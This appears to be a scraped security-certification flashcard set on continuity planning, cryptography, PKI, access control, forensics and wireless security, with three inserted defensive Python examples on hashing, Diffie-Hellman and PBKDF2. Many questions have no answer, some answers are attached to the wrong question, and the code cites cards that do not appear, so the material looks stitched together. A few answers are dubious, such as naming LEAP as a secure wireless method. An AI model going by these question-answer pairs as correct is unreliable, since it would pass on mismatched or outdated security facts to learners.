___________________ includes methods, such as alternate sites, used to keep an organization operational after an outage.
Continuity of operations planning (COOP)
The __________________ identifies the time period when you plan to restore a system after an outage; it is not a document.
Recovery time objective (RTO)
You are helping implement your company's business continuity plan. For one system, the plan requires a recovery time objective (RTO) of five hours and a recovery point objective (RPO) of one day. Which of the following would meet this requirement?
Ensure the system can be restored within five hours and ensure it does not lose more than one day of data.
The ________________ refers to the amount of data you can afford to lose, not time to restore a system.
Recovery point objective (RPO)
An organization is considering an alternate location as part of its business continuity plan. It wants to identify a solution that provides the shortest recovery time. What will it choose?
Your organization is working on its business continuity plan. Management wants to ensure that documents provide detailed information on what technicians should do after an outage. Specifically, they want to list the systems to restore and the order in which to restore them. What document includes this information?
disaster recovery plan (DRP)
Your organization is updating its disaster recovery documents. You're asked to review the communication plans for possible updates. Which of the following should you ensure is included in the communication plan?
Methods used to communicate with response team members, employees, suppliers, and customers
A business continuity plan (BCP) includes a chart listing roles within the organization along with their matching responsibilities during a disaster. It also includes a chain of command. What is the purpose of this chart?
_________________ clarifies who can make decisions during a disaster and can be documented in a chart listing roles and responsibilities along with a chain of command.
______________ focuses on recovery of IT systems.
IT contingency planning
The business continuity plan (BCP) coordinator at your organization is leading a meeting on-site with key disaster recovery personnel. The purpose of the meeting is to perform a test. What type of test is this?
A ________________ is discussion-based and is typically performed in a classroom or conference room setting.
______________ are hands-on exercises and include simulations and full-blown tests.
Personnel within your organization turned off the HR data server for six hours to perform a test. Which of the following is the MOST likely purpose of this?
continuity of operations planning (COOP)
Turning off a server for testing is to test elements of ______________. This helps to determine if the organization can continue to operate despite the outage.
continuity of operations planning (COOP)
Humidity controls in your data center are failing. You need to convince management of the importance of these. What would you tell them?
Failing humidity controls can cause damage from electro-static discharge (ESD) and condensation.
______________ do not provide any protection against electromagnetic interference (EMI), temperature, or ventilation.
Your organization is evaluating replacement HVAC systems and is considering increasing current capacities. Which of the following is a potential security benefit of increasing the HVAC capabilities?
Higher mean time between failures (MTBF) of hardware components due to lower temperatures
Increasing the heating, ventilation, and air conditioning (HVAC) capacity results in higher mean time between failures (MTBF) times by keeping systems at lower temperatures. ____________ indicate more failures.
Without adequate physical security controls, attackers can cause significant damage to systems within a data center. Which of the following could an attacker manipulate to cause extensive physical damage?
An attacker was able to sneak into your building but was unable to open the server room door. He bashed the proximity badge reader with a portable fire extinguisher and the door opened. What is the MOST likely reason that the door opened?
The access system was designed to fail-open for personal safety.
Which of the following is an environmental control?
Fencing, video surveillance, and motion detection are all __________.
physical security controls
Of the following choices, what can you use to verify data integrity?
_____________ is one of many available hashing algorithms used to verify data integrity.
Secure Hash Algorithm (SHA)
Advanced Encryption Standard (AES), Data Encryption Standard (DES), and Rivest Cipher 4 (RC4) are ______________.
symmetric encryption algorithms
A security technician runs an automated script every night designed to detect changes in files. Of the following choices, what are the most likely protocols used in this script?
MD5 and HMAC
___________, such as Message Digest 5 (MD5) and Hash-based Message Authentication Code (HMAC) can detect changes in files (or verify files have not lost integrity).
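The nightly change-detection script above and the earlier card about checking a downloaded definition file against the vendor's published hash are two uses of the same primitive. The following is an added example, not code from the original card set: a Python script that hashes files in chunks, compares a download against a published digest in constant time, builds a keyed HMAC-SHA256 manifest of a set of files, and reports what changed on the next run. HMAC rather than a bare hash is used for the manifest because an attacker who edits a file cannot also forge a matching tag without the key. The file names, contents and tampering in the demo are constructed for the example.

```python
import hashlib
import hmac
import json
import os
import secrets
import tempfile


def file_digest(path: str, algo: str = "sha256") -> str:
    """Hex digest of a file, read in chunks so large files do not sit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path: str, published_hex: str, algo: str = "sha256") -> bool:
    """Compare a downloaded file with the hash the vendor published out of band.
    The published value must come over a different channel than the file itself,
    or an attacker who swapped the file could swap the hash too."""
    return hmac.compare_digest(file_digest(path, algo), published_hex.lower())


def file_hmac(path: str, key: bytes) -> str:
    mac = hmac.new(key, digestmod="sha256")
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            mac.update(chunk)
    return mac.hexdigest()


def build_manifest(paths, key: bytes) -> dict:
    return {p: file_hmac(p, key) for p in sorted(paths)}


def detect_changes(baseline: dict, current: dict) -> dict:
    """Diff two manifests into modified, added and removed file lists."""
    return {
        "modified": sorted(p for p in baseline if p in current
                           and not hmac.compare_digest(baseline[p], current[p])),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def demo() -> dict:
    """Constructed run: baseline three config files, then tamper with one and delete one."""
    key = secrets.token_bytes(32)     # in practice kept off the monitored host
    with tempfile.TemporaryDirectory() as d:
        paths = []
        for name in ("router1.cfg", "switch1.cfg", "switch2.cfg"):
            p = os.path.join(d, name)
            with open(p, "w") as f:
                f.write(f"hostname {name}\n")
            paths.append(p)
        baseline = build_manifest(paths, key)
        with open(paths[1], "a") as f:
            f.write("enable secret changed-by-attacker\n")
        os.remove(paths[2])
        result = detect_changes(baseline, build_manifest(paths[:2], key))
        result["download_ok"] = verify_download(paths[0], file_digest(paths[0]))
        result["download_bad"] = verify_download(paths[0], "00" * 32)
        return {k: ([os.path.basename(x) for x in v] if isinstance(v, list) else v)
                for k, v in result.items()}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```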
______________ is a method used to secure email communication.
Pretty Good Privacy (PGP)
Elliptic curve cryptography (ECC), Advanced Encryption Standard (AES), and TwoFish are all examples of ____________.
Some encryption algorithms use stream ciphers and some use block ciphers. Which of the following are examples of block ciphers?
AES, DES, 3DES, and Blowfish
RC4 is a ____________ cipher.
Which of the following algorithms encrypts data in 64-bit blocks?
DES, 3DES, and Blowfish
Which of the following algorithms encrypts data in 128-bit blocks?
AES and Twofish
Which of the following algorithm(s) encrypts data one bit at a time?
An application developer needs to use an encryption protocol to encrypt credit card data within a database used by the application. Which of the following would be the FASTEST, while also providing strong confidentiality?
Blowfish, when compared against AES-256
Your organization uses several different types of cryptographic techniques. Which of the following techniques uses a private key and a public key?
Rivest, Shamir, Adleman (RSA)
Your network requires a secure method of sharing encryption keys over a public network. Which of the following is the BEST choice?
Diffie-Hellman allows entities to negotiate encryption keys securely over a public network. Once the entities negotiate the keys, they use ___________, but they can't share keys using symmetric encryption without first using a secure method such as Diffie-Hellman.
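The following is an added example, not code from the original card set: a Python walk-through of the Diffie-Hellman exchange described above, with both parties' messages, a check that rejects a peer value chosen to force the secret into a tiny subgroup, and the agreed secret then driving a symmetric primitive (an HMAC stands in for the symmetric cipher). The group is a freshly generated small safe prime purely so the script runs stand-alone; real deployments use a standardised 2048-bit or larger group, and the Party class, key sizes and message are assumptions made for the example.

```python
import hashlib
import hmac
import secrets


def is_probable_prime(n: int, rounds: int = 16) -> bool:
    """Miller-Rabin primality test with random bases."""
    if n < 2:
        return False
    for s in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % s == 0:
            return n == s
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = 2 + secrets.randbelow(n - 3)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_safe_prime(bits: int) -> int:
    """Return p = 2q + 1 with p and q prime (demonstration sizes only)."""
    while True:
        q = secrets.randbits(bits - 1) | (1 << (bits - 2)) | 1
        if is_probable_prime(q) and is_probable_prime(2 * q + 1):
            return 2 * q + 1


class Party:
    def __init__(self, name: str, p: int, g: int):
        self.name, self.p, self.g = name, p, g
        self.private = 2 + secrets.randbelow(p - 3)   # never leaves this side
        self.public = pow(g, self.private, p)         # this is what crosses the network

    def shared_key(self, peer_public: int) -> bytes:
        # For a safe prime, y^q == 1 iff y lies in the prime-order subgroup;
        # anything else (e.g. p - 1, of order 2) is rejected before use.
        q = (self.p - 1) // 2
        if not 2 <= peer_public <= self.p - 2 or pow(peer_public, q, self.p) != 1:
            raise ValueError("peer public value rejected (invalid or small subgroup)")
        secret = pow(peer_public, self.private, self.p)
        # KDF step: turn the big integer into a fixed-length symmetric key.
        return hashlib.sha256(secret.to_bytes((self.p.bit_length() + 7) // 8, "big")).digest()


def exchange(bits: int = 128) -> dict:
    p = generate_safe_prime(bits)
    g = 4           # a quadratic residue, so it generates the order-q subgroup
    alice, bob = Party("Alice", p, g), Party("Bob", p, g)
    # An eavesdropper sees only p, g, alice.public and bob.public.
    k_alice = alice.shared_key(bob.public)
    k_bob = bob.shared_key(alice.public)
    msg = b"router config backup"
    tag = hmac.new(k_alice, msg, "sha256").digest()
    return {"p": p, "keys_match": k_alice == k_bob,
            "tag_verifies": hmac.compare_digest(tag, hmac.new(k_bob, msg, "sha256").digest())}


if __name__ == "__main__":
    print(exchange())
```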
_________ is a key stretching technique used by some Unix systems to make password cracking more difficult.
Your organization plans to issue some employees mobile devices such as smartphones and tablets. These devices don't have a lot of processing power. Which of the following cryptographic methods has the LEAST overhead and will work with these mobile devices?
Elliptic Curve Cryptography (ECC) has minimal overhead and is often used with mobile devices for encryption.
_________ consumes a lot of processing time and isn't as efficient as Elliptic Curve Cryptography (ECC).
Triple Data Encryption Standard (3DES)
Password-Based Key Derivation Function 2 (PBKDF2) and bcrypt are _________ that salt passwords with additional bits to protect against brute force attempts.
key stretching techniques
A manager is suspected of leaking trade secrets to a competitor. A security investigator is examining his laptop and notices a large volume of vacation pictures on the hard drive. Data on this laptop automatically uploads to a private cloud owned by the company once a week. The investigator noticed that the hashes of most of the pictures on the hard drive are different from the hashes of the pictures in the cloud location. Which of the following is the MOST likely explanation for this scenario?
The manager is leaking data using steganography methods.
A heavily used application accesses a financial database on a server within your network. Due to recent data breaches, management wants to ensure transport encryption protects this data. Which of the following algorithms is the BEST choice to meet this goal?
Transport Layer Security (TLS) is a transport encryption protocol that can protect data while it is in transit. TLS and SSL both use certificates and revoked certificates are published in a _________.
certificate revocation list (CRL)
You are planning to encrypt data in transit. Which of the following protocols meets this need and encapsulates IP packets within an additional IP header?
TLS and SSL are both _________ that can protect data while in transit, although they do not encapsulate IP packets within an additional IP header.
transport encryption protocols
Homer wants to send a secure email to Marge so he decides to encrypt it. Homer wants to ensure Marge can verify that he sent it. Which of the following does Marge need to verify the certificate that Homer used in this process is valid?
The CA's public key
Bart wants to send a secure email to Lisa so he decides to encrypt it. Bart wants to ensure that Lisa can verify that he sent it. Which of the following does Lisa need to meet this requirement?
Bart's public key
Users in your organization sign their emails with digital signatures. What provides integrity for these certificates?
Hashing provides integrity for ____________, which are a hash of the message encrypted with the sender's private key and provide non-repudiation.
An application requires users to log on with their passwords. The application developers want to store the passwords in such a way that it will thwart rainbow table attacks. What key stretching techniques could you use?
bcrypt or PBKDF2
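The following is an added example, not code from the original card set: a Python password store using the standard library's PBKDF2-HMAC with a random per-user salt and a configurable iteration count, alongside a constructed "rainbow table" of precomputed unsalted MD5 digests. It shows the same password producing different salted hashes, verification in constant time, and the table cracking the unsalted digest but not the salted one (this also answers the earlier card on reducing the chance that hashed passwords are recovered). The storage format, iteration counts and the table's contents are assumptions made for the example.

```python
import hashlib
import hmac
import secrets

ITERATIONS = 600_000   # assumed work factor; raise it as hardware gets faster


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Salt, stretch and pack into a self-describing string for storage."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Re-derive with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def unsalted_md5(password: str) -> str:
    """What a rainbow table targets: one deterministic digest per password."""
    return hashlib.md5(password.encode()).hexdigest()


# Constructed rainbow table: precomputed digests for a few common passwords.
RAINBOW = {unsalted_md5(p): p for p in ("password", "123456", "letmein", "qwerty")}


def crack_with_table(digest_hex: str):
    return RAINBOW.get(digest_hex)


def demo(iterations: int = 1_000) -> dict:
    """Low iteration count so the demo runs quickly; production uses ITERATIONS."""
    h1 = hash_password("letmein", iterations)
    h2 = hash_password("letmein", iterations)
    return {
        "salted_hashes_differ": h1 != h2,               # different salts, same password
        "verify_ok": verify_password("letmein", h1),
        "verify_wrong": verify_password("letmeout", h1),
        "md5_cracked": crack_with_table(unsalted_md5("letmein")),
        "salted_cracked": crack_with_table(h1.split("$")[-1]),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```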
Homer wants to use digital signatures for his emails and realizes he needs a certificate. Which of the following will issue Homer a certificate?
Certificate Authority (CA)
You need to submit a certificate signing request (CSR) to a Certificate Authority (CA). Which of the following would you do FIRST?
Generate a new RSA-based private key
When submitting a certificate signing request (CSR) to a Certificate Authority (CA), first you create the RSA-based private key and then create the matching _________ from it, which you include in the certificate signing request (CSR) that you send to the Certificate Authority (CA).
Your organization is planning to implement an internal PKI. What is required to ensure users can validate certificates?
certificate revocation list (CRL)
A certificate revocation list (CRL) includes a list of revoked certificates and it allows users to _________ certificates.
Your organization requires the use of a PKI and it wants to implement a protocol to validate trust with minimal traffic. Which of the following protocols validates trust by returning short responses, such as "good" or "revoked"?
Online Certificate Status Protocol (OCSP)
A user's laptop developed a problem and can no longer boot. Help desk personnel tried to recover the data on the disk, but the disk is encrypted. Which of the following can be used to retrieve data from the hard disk?
A recovery agent can decrypt data and messages if the user's _________ is no longer available.
A security manager needs to identify a policy that will reduce the risk of personnel within an organization colluding to embezzle company funds. Which of the following is the BEST choice?
A security auditor discovered that several employees in the Accounting department can print and sign checks. In her final report, she recommended restricting the number of people who can print checks and the number of people who can sign them. She also recommended that no one should be authorized to print and sign checks. What policy is she recommending?
separation of duties
A __________ prevents any single person from performing multiple job functions that might allow the person to commit fraud.
separation of duties principle
__________ specifies that every object has an owner.
Discretionary access control
Your organization includes a software development division within the IT department. One developer writes and maintains applications for the Sales and Marketing departments. A second developer writes and maintains applications for the Payroll department. Once a year, they have to switch roles for at least a month. What is the purpose of this practice?
To enforce a job rotation policy
An __________ informs users of their responsibilities when using an organization's equipment.
acceptable use policy
A security manager is reviewing security policies related to data loss. Which of the following is the security administrator MOST likely to be reviewing?
clean desk policy
A __________ requires users to organize their areas to reduce the risk of possible data theft and password compromise.
clean desk policy
Get Certified Get Ahead (GCGA) has outsourced some application development to your organization. Unfortunately, developers at your organization are having problems getting an application module to work and they want to send the module with accompanying data to a third-party vendor for help in resolving the problem. Which of the following should developers consider before doing so?
review NDAs and verify that sharing data with a third party doesn't violate any existing NDAs
Two companies have decided to work together on a project and implemented an MOU. Which of the following represents the GREATEST security risk in this situation?
an MOU doesn't have strict guidelines to protect sensitive data
An __________ includes strict requirements for connections and is often used with an MOU.
interconnection security agreement (ISA)
Your organization is considering storage of sensitive data in a cloud provider. Your organization wants to ensure the data is encrypted while at rest and while in transit. What type of interoperability agreement can your organization use to ensure the data is encrypted while in transit?
interconnection security agreement (ISA)
A __________ stipulates performance expectations of a vendor.
service level agreement (SLA)
A user recently worked with classified data on an unclassified system. You need to sanitize all the reclaimed space on this system's hard drives while keeping the system operational. Which of the following methods will BEST meet this goal?
use a cluster tip wiping tool
A cluster tip wiping tool sanitizes reclaimed space on hard drives. The __________ is the extra space in the last cluster of a file, which can hold remnants of data.
A __________ successfully erases a file, but does not affect clusters in reclaimed space.
file shredding tool
__________ the disk magnetically erases it.
A network administrator needs to update the operating system on switches used within the network. Assuming the organization is following standard best practices, what should the administrator do first?
Submit a request using the change management process
Security personnel recently released an online training module advising employees not to share personal information on any social media web sites that they visit. What is this advice MOST likely trying to prevent?
cognitive password attacks
A __________ utilizes information that a person would know, such as the name of their first pet or their favorite color. If this information is available on Facebook or another social media site, attackers can use it to change the user's password.
cognitive password attack
A __________ is a password attack, but it uses a database of precalculated hashes.
rainbow table attack
Your organization blocks access to social media web sites. The primary purpose is to prevent data leakage, such as accidental disclosure of proprietary information. What is an additional security benefit of this policy?
protects against banner ad malware
Your organization hosts a web-based server that remote administrators access via Telnet. Management wants to increase their rights to prosecute unauthorized personnel who access this server. Which of the following is the BEST choice?
add a warning banner
An incident response team is following typical incident response procedures. Which of the following phases is the BEST choice for analyzing an incident with a goal of identifying steps to prevent a reoccurrence of the incident?
You should analyze an incident during the lessons learned stage of __________ with the goal of identifying steps to prevent reoccurrence.
After a recent incident, a forensic analyst was given several hard drives to analyze. What should the analyst do first?
take hashes and capture system images
Forensic analysts capture images and take hashes before beginning analysis, and they only analyze the __________, not the original drive. This protects it from accidental modification and preserves it as usable evidence.
A forensic expert is preparing to analyze a hard drive. Which of the following should the expert do FIRST?
capture an image
A security analyst tagged a computer stating when he took possession of it. What is the BEST explanation for this?
to begin a chain of custody
You are helping your organization create a security policy for incident response. What should be included when an incident requires confiscation of a physical asset?
keep a record of everyone who took possession of the physical asset
It is important to keep a chain of custody for any confiscated physical items and the __________ is a record of everyone who took possession of an asset after it was first confiscated.
chain of custody
Hashes should be taken before __________, but they are not required before confiscating equipment.
capturing an image
An administrator recently learned of an attack on a Virginia-based web server from IP address 126.96.36.199 at 11:35:33 GMT. However, after investigating the logs, he is unable to see any traffic from that IP address at that time. Which of the following is the MOST likely reason why the administrator was unable to identify the attack?
he did not account for time offsets
Personnel in an organization are sharing their access codes to cipher locks with unauthorized personnel. As a result, unauthorized personnel are accessing restricted areas of the building. What is the BEST response to reduce this risk?
provide security training to personnel
Your organization has spent a significant amount of money on training employees on security awareness. Your organization wants to validate the success of this training. Which of the following is the BEST choice?
__________ are measurements and you can use them to validate the success of a security awareness program.
A web server has recently been attacked and a first responder has disconnected it from the network to isolate it. A forensic analyst is preparing to analyze the server but needs to capture the data in a specific order to ensure it is preserved. Of the following, which is the most volatile and should be collected first? RAM, SWAP, CPU Cache, Remote Logs, Hard Drive
A __________ is more volatile than regular RAM because a system has significantly less cache memory than regular RAM, so a system overwrites cache more quickly than regular RAM.
A web server has recently been attacked and a first responder has disconnected it from the network to isolate it. A forensic analyst is preparing to analyze the server but needs to capture the data in a specific order to ensure it is preserved. Of the following, which is slightly less volatile than cache memory and should be collected second? RAM, SWAP, CPU Cache, Remote Logs, Hard Drive
RAM and cache memory will be lost if the system is __________.
A __________ is an extension of RAM, but it is stored on the hard drive. The swap file is rebuilt each time the system is rebooted, so it is more volatile than regular data stored on a hard drive.
SWAP (or paging file)
Data on the __________ is semi-permanent. It remains on the hard drive even after the system is powered down and rebooted.
__________ are less volatile than data stored on a target system. For this reason, many servers send log data to a remote system for centralized collection. Even if a server is completely destroyed, the centralized logs remain unmodified.
Lisa hid several plaintext documents within an image file. Which security goal is she pursuing?
You are the security administrator in your organization. You want to ensure that a file maintains integrity. Which of the following choices is the BEST choice to meet your goal?
An e-commerce web site does not currently have an account recovery process for customers who have forgotten their passwords. Which of the following choices are the BEST items to include if web site developers add this process?
Create a web-based form that verifies customer identities using another method AND set a temporary password that expires upon first use.
Your organization is planning to implement stronger authentication for remote access users. An updated security policy mandates the use of token-based authentication with a password that changes every 30 seconds. Which of the following choices BEST meets this requirement?
Time-based One-Time Password (TOTP)
____________ creates passwords that do not expire.
HMAC-based One-Time Password (HOTP)
_____________ uses a nonce (a number used once), but a nonce does not expire after 30 seconds like a Time-based One-Time Password (TOTP) does.
Challenge Handshake Authentication Protocol (CHAP)
Your organization issues laptops to mobile users. Administrators configured these laptops with full disk encryption, which requires users to enter a password when they first turn on the computer. After the operating system loads, users are required to log on with a username and password. Which of the following choices BEST describes this?
Security Assertion Markup Language (SAML) is an Extensible Markup Language (XML) used for ___________.
single sign-on (SSO)
Users at your organization currently use a combination of smart cards and passwords, but an updated security policy requires multifactor security using three different factors. Which of the following can you add to meet the new requirement?
Fingerprint readers would add ___________ from the something you are factor of authentication.
A network includes a ticket-granting ticket server used for authentication. What authentication service does this network use?
_____________ is an authentication service created by Cisco.
Terminal Access Controller Access-Control System Plus (TACACS+)
_________________ is an X.500-based authentication service that can be secured with Transport Layer Security (TLS).
Lightweight Directory Access Protocol (LDAP)
You are modifying a configuration file used to authenticate Unix accounts against an external server. The file includes phrases such as DC=Server1 and DC=Com. Which authentication service is the external server using?
Lightweight Directory Access Protocol (LDAP)
Which of the following choices is an AAA protocol that uses shared secrets as a method of security?
_____________ is an authentication, authorization, and accounting (AAA) protocol that uses shared secrets (or passwords) for security.
Remote Authentication Dial-In User Service (RADIUS)
Your organization wants to reduce the amount of money it is losing due to thefts. Which of the following is the BEST example of an equipment theft deterrent?
A manager recently observed an unauthorized person in a secure area, which is protected with a cipher lock door access system. After investigation, he discovered that an authorized employee gave this person the cipher lock door code. Which of the following is the BEST response to this issue at the minimum cost?
provide security awareness training
Management recently rewrote the organization's security policy to strengthen passwords created by users. It now states that passwords should support special characters. Which of the following choices is the BEST setting to help the organization achieve this goal?
You have discovered that some users have been using the same passwords for months, even though the password policy requires users to change their password every 30 days. You want to ensure that users cannot reuse the same password. Which settings should you configure?
password history and minimum password age
The ________________ setting records previously used passwords to prevent users from reusing the same passwords.
Using the password history setting combined with the ___________________ setting prevents users from changing their password repeatedly to get back to their original password.
minimum password age
The ___________ setting ensures users change their passwords regularly.
maximum password age
A company recently hired you as a security administrator. You notice that some former accounts used by temporary employees are currently enabled. Which of the following choices is the BEST response?
Craft a script to identify inactive accounts based on the last time they logged on.
Running a _________________ allows you to identify inactive accounts, such as accounts that haven't been logged on to in the last 30 days.
last logon script
An organization supports remote access, allowing users to work from home. However, management wants to ensure that personnel cannot log on to work systems from home during weekends and holidays. Which of the following BEST supports this goal?
You configure access control for users in your organization. Some departments have a high employee turnover, so you want to simplify account administration. Which of the following is the BEST choice?
Group-based privileges is a form of ________________ and it simplifies administration. Instead of assigning permissions to new employees individually, you can just add new employee user accounts into the appropriate groups to grant them the rights and permissions they need for the job.
role-based access control
_________________ require you to manage privileges for each user separately, and this increases the account administration burden.
You are configuring a file server used to share files and folders among employees within your organization. However, employees should not be able to access all folders on this server. Which of the following choices is the BEST method to manage security for these folders?
use security groups with appropriate permissions
You can create security groups, place users into these groups, and grant access to the folders by assigning appropriate permissions to the security groups. For example, the security groups might be Sales, Marketing, and HR, and you place users into the appropriate group based on their job. This is an example of using ________________.
The Retirement Castle uses groups for ease of administration and management. They recently hired Jasper as their new accountant. Jasper needs access to all the files and folders used by the Accounting department. What should the administrator do to give Jasper appropriate access?
Create an account for Jasper and add the account to the Accounting group
Your organization recently updated its security policy and indicated that Telnet should not be used within the network. Which of the following should be used instead of Telnet?
Secure Copy (SCP) and Secure File Transfer Protocol (SFTP) use ______ to encrypt files sent over the network.
One of your web servers was recently attacked and you have been tasked with reviewing firewall logs to see if you can determine how an attacker accessed the system remotely. You identified the following port numbers in log entries: 21, 22, 25, 53, 80, 110, 443, and 3389. Which of the following protocols did the attacker MOST likely use?
You are reviewing logs from a wireless survey within your organization's network due to a suspected attack and you notice the following entries:
MAC                  SSID                  Encryption  Power
12:AB:34:CD:56:EF    GetCertifiedGetAhead  WPA2        47
12:AB:34:CD:56:EF    GetCertifiedGetAhead  WPA2        62
56:CD:34:EF:12:AB    GetCertifiedGetAhead  WPA2        20
12:AB:34:CD:56:EF    GetCertifiedGetAhead  WPA2        57
12:AB:34:CD:56:EF    GetCertifiedGetAhead  WPA2        49
Of the following choices, what is the MOST likely explanation of these entries?
An evil twin is in place.
Which of the following provides the largest address space?
While analyzing a firewall log, you notice traffic going out of your network on UDP port 53. What does this indicate?
Domain Name System (DNS) traffic uses ____________ by default to resolve host names to IP addresses.
UDP port 53
Secure File Transfer Protocol (SFTP) uses _________.
A team of users in your organization needs a dedicated subnet. For security reasons, other users should not be able to connect to this subnet. Which of the following choices is the BEST solution?
restrict traffic based on physical addresses
Restricting traffic based on physical addresses, also called ___________________, is configured on a switch.
MAC address filtering
_________________ monitors and manages network devices.
An organization recently updated its security policy. A new requirement dictates a need to increase protection from rogue devices plugged into physical ports. Which of the following choices provides the BEST protection?
_________________ is a port-based authentication protocol and it requires systems to authenticate before they are granted access to the network. If an attacker plugged a rogue device into a physical port, the 802.1x server would block it from accessing the network. MAC limiting and filtering provide some protection against rogue devices, but an 802.1x server provides much stronger protection.
What would administrators typically place at the end of an ACL on a firewall?
Administrators would place an implicit deny rule at the end of an access control list (ACL) to deny all traffic that hasn't been _________________. Many firewalls place this rule at the end by default.
An _________________ explicitly allows all traffic and defeats the purpose of a firewall.
allow all all rule
Your organization wants to protect its web server from cross-site scripting attacks. Which of the following choices provides the BEST protection?
web application firewall (WAF)
A _________________ is an Application layer firewall designed specifically to protect web servers. Although host-based and network-based firewalls provide protection, they aren't necessarily Application layer firewalls, so they do not provide the same level of protection for a web server.
web application firewall (WAF)
Management recently learned that several employees are using the company network to visit gambling and gaming web sites. They want to implement a security control to prevent this in the future. Which of the following choices would meet this need?
Unified Threat Management (UTM)
A unified threat management (UTM) typically includes a _________________ and can block access to web sites, just as a proxy server can block access to web sites.
_________________ operates on Layer 7 of the OSI model.
secure copy (SCP)
_________________ protocol operates on Layer 3 of the OSI model.
_________________ operates on Layer 4 of the OSI model.
_________________ operates on Layer 2 of the OSI model.
Which of the following BEST describes a false negative?
An IDS does not detect a buffer overflow attack.
If an IDS falsely indicates an attack occurred, it is a __________.
A locked door that opens after a power failure is designed to ___________.
Company management suspects an employee is stealing critical project information and selling it to a competitor. They would like to identify who is doing this, without compromising any live data. What is the BEST option to meet this goal?
Add fabricated project data on a honeypot.
Attackers frequently attack your organization, and administrators want to learn more about zero-day attacks on the network. What can they use?
Security personnel recently noticed a successful exploit against an application used by many employees at their company. They notified the company that sold them the software and asked for a patch. However, they discovered that a patch wasn't available. What BEST describes this scenario?
What type of encryption is used with WPA2 CCMP?
Wi-Fi Protected Access II (WPA2) with Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) uses _____________.
Advanced Encryption Standard (AES)
Temporal Key Integrity Protocol (TKIP) and Secure Sockets Layer (SSL) both use __________.
Rivest Cipher 4 (RC4)
Administrators in your organization are planning to implement a wireless network. Management has mandated that they use a RADIUS server and implement a secure wireless authentication method. Which should they use?
Lightweight Extensible Authentication Protocol (LEAP)
Which of the following wireless security mechanisms is subject to a spoofing attack?
MAC address filtering
MAC address filtering is vulnerable to _____________ because attackers can easily change MAC addresses on network interface cards (NICs).
Wired Equivalent Privacy (WEP) can be cracked using an ______________ attack.
initialization vector (IV)
_____________ requires users to enter credentials, so it isn't susceptible to a spoofing attack.
Which of the following is the BEST description of why disabling SSID broadcast is not an effective security measure against attackers?
The network name is contained in wireless packets in plaintext.
Mobile users in your network report that they frequently lose connectivity with the wireless network on some days, but on other days they don't have any problems. Which of the following types of attacks could cause this?
An _________ is a rogue wireless access point with the same service set identifier (SSID) as a live wireless access point.
A wireless jamming attack is a type of ____________ attack that can cause wireless devices to lose their association with access points and disconnect them from the network.
An initialization vector (IV) attack is a specific type of attack on Wired Equivalent Privacy (WEP) to ____________.
crack the key
A ____________ captures traffic with the goal of replaying it later to impersonate one of the parties of the original transmission.
Management within your organization wants some users to be able to access internal network resources from remote locations. Which of the following is the BEST choice to meet this need?
You suspect that an executable file on a web server is malicious and includes a zero-day exploit. Which of the following steps can you take to verify your suspicions?
Perform an operating system baseline comparison
An _____________________ can verify if a file is in your baseline or was added after the server was deployed.
operating system baseline comparison
Lisa has scanned all the user computers in the organization as part of a security audit. She is creating an inventory of these systems, including a list of applications running on each computer and the application versions. What is she MOST likely trying to identify?
Administrators create a list of applications installed on systems as part of an application baseline, also called a ______________.
Host software baseline
A _____________ looks for vulnerabilities within code; however, applications are compiled, so the code is not easily available for review.
An ____________ looks at applications, protocols, and services.
An updated security policy identifies authorized applications for company-issued mobile devices. Which of the following would prevent users from installing other applications on these devices?
________________ are used with routers, firewalls, and files, but do not restrict installation of applications.
A company is implementing a feature that allows multiple servers to operate on a single physical server. What is this?
_____________ refers to accessing computing resources via a different location than your local computer.
______________ is a cloud computing option where the vendor provides access to a computer, but customers manage it.
Infrastructure as a Service (IAAS)
___________________ techniques examine and inspect data looking for unauthorized data transmissions.
data loss prevention (DLP)
A software vendor recently developed a patch for one of its applications. Before releasing the patch to customers, the vendor needs to test it in different environments. Which of the following solutions provides the BEST method to test the patch in different environments?
A virtualized sandbox provides a simple method of testing patches and would be used with _____________ so that the virtual machine (VM) can be easily reverted to the original state.
Your company has recently standardized servers using imaging technologies. However, a recent security audit verified that some servers were immune to known OS vulnerabilities, whereas other systems were not immune to the same vulnerabilities. Which of the following would reduce these vulnerabilities?
_____________ ensure operating systems (OS) are kept up to date with current patches. Patches ensure systems are immune to known vulnerabilities.
Patch management procedures
Someone stole an executive's smartphone, and the phone includes sensitive data. What should you do to prevent the thief from reading the data?
use remote wipe
_____________ can send a remote wipe signal to the phone to delete all the data on the phone, including any cached data.
Remote wipe capabilities
Your organization has issued mobile devices to several key personnel. These devices store sensitive information. What can administrators implement to prevent data loss from these devices if they are stolen?
full device encryption, screen lock, account lockout, and remote wipe capabilities
Homer wants to ensure that other people cannot view data on his mobile device if he leaves it unattended. What should he implement?
Management wants to implement a system that will provide automatic notification when personnel remove devices from the building. Which of the following security controls will meet this requirement?
Radio-frequency identification (RFID)
Radio-frequency identification (RFID) provides _____________ and can detect movement of devices.
automated inventory control
_____________ provides geographic location for pictures posted to social media sites.
Your organization was recently attacked, resulting in a data breach, and attackers captured customer data. Management wants to take steps to better protect customer data. Which of the following will BEST support this goal?
Stronger access controls and encryption
